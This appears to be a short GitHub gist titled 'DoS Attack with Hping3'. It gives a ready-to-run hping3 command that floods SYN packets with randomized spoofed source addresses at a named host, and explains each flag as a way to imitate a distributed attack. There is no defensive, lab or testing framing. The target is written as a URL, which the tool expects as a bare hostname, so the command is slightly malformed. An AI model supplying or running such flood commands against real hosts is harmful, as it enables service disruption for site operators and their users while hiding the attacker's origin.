Skip to content

Instantly share code, notes, and snippets.

@ouic
ouic / dos.md
Created April 22, 2026 11:12 — forked from davidlares/dos.md
DoS attack with hping3

DoS Attack with Hping3

Run the command: hping3 --flood -S -V --rand-source http://stv.com

Where:

  1. --flood send packets as fast as possible
  2. -S (Syn packet): legit TCP packet connection
  3. -V verbose mode
  4. --rand-source randomize the IP source address, like it's requested from different systems (sort of DDoS)
@ouic
ouic / SETUP_DAY.md
Created June 8, 2021 18:36
Starting my coding journey...
@ouic
ouic / SETUP_DAY.md
Created May 12, 2021 22:13
Starting my coding journey...
@ouic
ouic / SETUP_DAY.md
Created May 10, 2021 10:05
Starting my coding journey...